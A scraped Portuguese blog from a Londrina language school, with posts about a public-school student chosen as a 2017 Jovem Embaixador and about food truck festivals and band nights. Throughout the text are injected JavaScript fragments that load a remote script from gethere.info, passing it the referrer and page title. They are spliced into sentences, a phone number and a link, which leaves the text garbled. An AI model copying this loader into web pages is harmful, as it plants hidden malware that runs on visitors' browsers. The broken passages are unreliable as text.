DE UM SONHO PARA JOVEM EMBAIXADOR

Estudante da rede pública de ensino, é selecionado como jovem embaixador 2017 e ganha bolsa de estudos no Instituto Cultural Brasil Estados Unidos.

Gabriel Vinicius de Souza – Jovem Embaixador 2017.

Quando o próximo torna-se prioridade, as portas se abrem e tudo acontece. Este é o caso do estudante de física, Gabriel Vinicius de Souza, 17, que ao ver a realidade dos colegas, decidiu descruzar os braços e pôr a mão na massa.

Estudante da rede pública, Gabriel via a dificuldade que muitos adolescentes encontravam em certas matérias. Foi aí que o jovem pensou, “os alunos precisam de alguém que os ajude fora das salas de aula, será que eu posso fazer alguma coisa para ajudar? ”

Desde então, com a ajuda da vice-diretora, que abraçou o projeto, o garoto passou a monitorar grupos de alunos. Foram dois anos de muito esforço e dedicação que resultaram em um prêmio mais que merecido. Gabriel que sempre teve o sonho de estudar fora, viu seu sonho virar realidade.

A professora de inglês da escola, ficou sabendo de um programa chamado Jovens Embaixadores que tem o objetivo de levar aos Estados Unidos “alunos brasileiros da rede pública que são exemplos em suas comunidades. – (Jovens Embaixadores). Ao falar do programa em sala de aula o jovem interessou-se e inscreveu-se e a partir de então seus dias tornaram-se uma eterna expectativa.

Após muitas fases de seleção, a maioria realizadas aqui no Cultural, no dia 28 de outubro de 2016 a notícia mais esperada do ano chegou. Gabriel havia sido selecionado como Jovem Embaixador 2017.

Foram 3 semanas inesquecíveis, recheadas de novidades, workshops, passeios e estudos. O jovem embaixador conheceu Lake Tahoe, Tulsa e Washington. Mas dos três destinos o estudante ficou boquiaberto com Lake Tahoe “um dos lugares mais bonitos que eu já vi na vida. Ele é um lago que é totalmente puro”. E é puro mesmo, o lago tem 99,94% de pureza e 600 metros de profundidade.

Ao voltar para o Brasil as surpresas não terminaram, o Instituto Cultural, deu ao notório estudante uma bolsa de estudos para concluir o inglês e receber um certificado de proficiência. Já estudando aqui, ele nos contou como está sendo, “Está sendo muito legal! Porque eu estou realmente aperfeiçoando tudo o que eu aprendi. E podendo estudar gramática mais afundo que é o meu problema, está sendo muito bom”.

Ele não parou por aí, no futuro pretende continuar o trabalho voluntário, aprender mais duas línguas, ser professor de física e ainda quer ser professor aqui do Cultural. Para todos que querem seus sonhos realizados ele deixou um recadinho: “Você só precisa querer! Se você não tem um nível muito bom de inglês, vai, se dedica, estude e você vai conseguir. Não desista! ”.

 

FREAKNAITES ANIMA A GALERA NO CULTURAL FOOD TRUCK FESTIVAL

No dia 13 de dezembro, a banda Freaknaites subiu ao palco do Cultural e agitou a galera durante o segundo Cultural Food Truck Festival.

O grupo levou ao público, o melhor de Stevie Wonder, Joe Cocker, BB King, Eric Clapton, Nina Simone, Etta James, Ray Charles e muito mais.

O evento começou com a Formatura dos alunos do Instituto Cultural Brasil Estados Unidos (apenas para convidados) e posteriormente foi aberto para o público em geral.

Rafael Fregonezi, estava entre os formandos da noite e adorou o novo formato da formatura. “Achei muito legal a ideia de aliar nossa formatura com os famosos Food Trucks e com uma banda com um som tão bacana”.

O formando Pedro, também elogiou o evento e aprovou a ideia de uma formatura com um estilo um pouco menos formal. “Achei mais jovem e descontraído. Minha família também gostou e afirmou achar importante essa evolução”.

Já amigas Ana Carolina, Ana Paula e Isadora foram apenas prestigiar ao evento, mas também adoraram a proposta de unir comida e música boa em um só lugar.

“Essa iniciativa de levar a cultura americana aos alunos e a comunidade como um todo, de maneira divertida e descontraída é, sem dúvida, um dos grandes diferenciais que admiramos no Cultural”.

O baixista e vocalista da banda, Alessandro Franco também elogiou o projeto e a iniciativa da escola. “Para nós da Freaknaites é sempre um prazer tocar no Cultural. Desta vez foi ainda melhor, porque o evento foi ao ar livre e, tocar assim tem mais a ver com a cara e proposta da banda. O espaço e a estrutura foram perfeitos para os food trucks e o palco, proporcionando um show agradável tanto para os músicos quanto para o público. Londrina precisa de mais eventos assim”.

E se você não conseguiu comparecer ao Cultural Food Truck Festival, fique ligado aqui no nosso blog, que em 2017 traremos novas atrações pra você.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

FREAKNAITES SOBE AO PALCO DO 2º CULTURAL FOOD TRUCK FESTIVAL

No próximo dia 13 de dezembro, o Cultural irá realizar o segundo Cultural Food Truck Festival, com a participação da banda Freaknaites.

O evento irá começar às 19 horas com a Formatura dos alunos do Cultural (apenas para convidados), e a partir das 20:30 os portões serão abertos para o público em geral.

No cardápio dos Food Trucks, os visitantes irão encontrar desde hambúrgueres, massas, churros, gastronomia chinesa, crepe francês, petiscos em geral, até o famoso chop artesanal.

Já para a programação musical está confirmado um super show com a banda Freaknaites. Formada em 2013, a banda resulta de uma fusão de vários gêneros musicais, como Blues, Soul/Groove, Rock e Jazz.

Composta pelos músicos André Perez (guitarra e vocal), Vitor Struck (guitarra e vocal) Alessandro Franco (baixo e vocal) e André Coudeiro (bateria e vocal), o grupo traz em seu repertório, o melhor dos anos 60 e 70.

Para a apresentação, eles prometem grandes sucessos de Stevie Wonder, Joe Cocker, BB King, Eric Clapton, Nina Simone, Etta James, Ray Charles e muito mais.

O show começa à partir das 20h30 e é gratuito.

Outras informações na secretaria da escola, através do telefone (43) 3375-9999.d.getElementsByTagName(‘head’)[0].appendChild(s);

SENHOR BONIFÁCIO AGITA A GALERA NO PRIMEIRO CULTURAL FOOD TRUCK FESTIVAL

 

No último dia 19 de outubro, a banda londrinense Senhor Bonifácio agitou a plateia do 1º Cultural Food Truck Festival.

O grupo levou ao público, o melhor de Beatles, Stones, Led Zeppelin, AC/DC, Red Hot, Strokes, Franz Ferndinand, Queen, The Killers e muito mais.

Na plateia, estavam a cônsul americana Sara Besoulov e sua companheira de trabalho Vanessa Diniz. “Viemos trabalhar em Londrina, e recebemos o convite para prestigiar o evento. E achamos incrível! Um ambiente extremamente agradável, com ótima opções de comida e música boa. Além disso, a banda possui um inglês muito bom. É uma oportunidade dos alunos terem um maior contato com a cultura americana de maneira descontraída”, afirmou a cônsul.

Vanessa também elogiou o evento. “ Foi muito divertido e com opções de gastronomia bastante diversificadas. Embora o evento promova a cultura americana, ele possui um ingrediente brasileiro que faz toda diferença: a alegria”.

O vocalista da banda, Marcelo Celligoi, também elogiou o projeto e a iniciativa da escola. “Foi um evento sensacional! A galera estava muito animada. E foi bacana ver pessoas até de outras cidades apreciando o evento”.

Para o baixista e tecladista, Eduardo Sahão, a ideia de juntar comida e música boa, levando a cultura para a população foi sensacional!

As amigas Lilian Fukuda, Eliane Vieira e Susy Naomi, que estavam na plateia, afirmaram que sempre vão curtir as bandas que se apresentam no Friday Night Live (promovido pelo Cultural), e que acharam ótima a ideia de juntar food truck com música boa em um ambiente tranquilo e familiar”.

E você que não conseguiu comparecer ao primeiro Cultural Food Truck Festival, fique ligado aqui no nosso blog e não perca as nossas próximas atrações!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Inscrições para o Programa Jovens Embaixadores 2017 vão até 19 de agosto. Não perca essa oportunidade!

O programa levará 50 alunos da rede pública para um intercâmbio de três semanas nos EUA

A Embaixada dos Estados Unidos informa que as inscrições para a décima quinta edição do Programa Jovens Embaixadores, intercâmbio estudantil de três semanas nos Estados Unidos, vão até o próximo 19 de agosto de 2016. Jovens da rede pública brasileira, de 15 a 18 anos, que são exemplos em suas comunidades por meio de sua liderança, excelência acadêmica e conhecimento da língua inglesa, são convidados a se candidatar.

Quer saber mais sobre o Programa Jovens Embaixadores? Acesse o link e tire as suas dúvidas:https://www.youtube.com/watch?v=sWF2AvTuTqM

Visite também o site do projeto: www.facebook.com/jovensembaixadores.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Freak Naites agita a plateia do Friday Night Live

Na última sexta-feira, dia 1, a banda londrinense Freak Naites subiu ao palco do Cultural Hall para mais um Friday Night Live.

O grupo levou ao público, o melhor de Stevie Wonder, Joe Cocker, BB King, Eric Clapton, Nina Simone, Etta James, Ray Charles e muito mais.

O vocalista da banda, André Perez, elogiou o projeto.“É uma oportunidade muito bacana que o Cultural oferece para as bandas da cidade mostrarem um pouco mais do seu trabalho para a população. Além de ser uma experiência muito diferente para nós enquanto banda. É uma apresentação mais intimista, em um formado de show mesmo. Foi um experiência muito diferente ver pessoas que acompanham nosso trabalho nos assistindo em um outro formato de apresentação”.

Natáia Gadelha, que prestigiou o evento, contou que soube do Friday Night Live através do Facebook. “É  a primeira vez que eu venho e gostei muito. Achei uma ótima oportunidade para conhecermos as bandas boas que a nossa cidade tem, em um ambiente mais tranquilo e agradável”.

As amigas Hosana Alves de Oliveira e Priscila Kojo também conheceram o evento através das redes sociais e aprovaram a escolha da banda. “Não conhecia a Freak Naites e gostei muito”, contou Hosana. Priscila também elogiou a escolha. “É uma banda que toca o meu estilo musical favorito, e eu não conhecia. Mês que vem estarei aqui novamente “

O Friday Night Live acontece na primeira sexta-feira do mês no Cultural e tem como objetivo levar cultura a população.

Fique ligado aqui no blog e não perca as próximas atrações!

 

} else {